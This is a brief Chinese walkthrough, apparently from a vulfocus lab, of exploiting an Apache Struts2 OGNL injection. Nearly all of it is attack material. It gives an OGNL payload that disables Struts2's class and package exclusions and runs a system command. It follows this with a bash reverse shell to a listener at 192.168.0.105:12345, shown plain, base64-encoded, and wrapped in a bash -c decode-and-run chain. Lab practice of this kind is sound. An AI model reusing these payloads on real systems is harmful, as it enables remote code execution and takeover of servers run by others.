漏洞环境搭建:vulfocus
然后找到该页面
点击提交,发现命令被执行
构建执行命令的Payload
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream())).(#q)}
执行反弹shell,kali监听12345端口
bash -i >& /dev/tcp/192.168.0.105/12345 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA1LzEyMzQ1IDA+JjE=
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA1LzEyMzQ1IDA+JjE=}|{base64,-d}|{bash,-i}
然后将上面执行命令换成第三个